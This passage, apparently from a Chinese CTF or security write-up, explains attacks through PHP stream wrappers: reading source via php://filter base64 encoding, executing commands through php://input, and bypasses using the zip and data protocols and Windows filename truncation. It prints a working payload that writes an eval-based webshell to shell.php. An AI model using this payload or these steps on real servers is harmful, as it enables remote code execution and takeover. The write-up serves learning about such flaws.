这里convert.base64-encode是将源码以base64编码,然后读取出来,我解码之后得到
这里就能发现flag
#2 命令执行获取webshell
如果通过php://input实验发现存在漏洞,可以使用system命令dir查看目录,发现敏感的目录
然后就可以通过<?php fputs ( fopen(\'shell.php\',\'w\') , \'<?php eval($_POST[shell])?>\') ;?>,写入一句话
#3
我们也可以用压缩协议,data协议进行绕过,也可以利用windows的特性,文件名字大于256时后面的内容就会舍弃,来进行绕过。
php协议很常用很强大,这里只是我的一些浅见。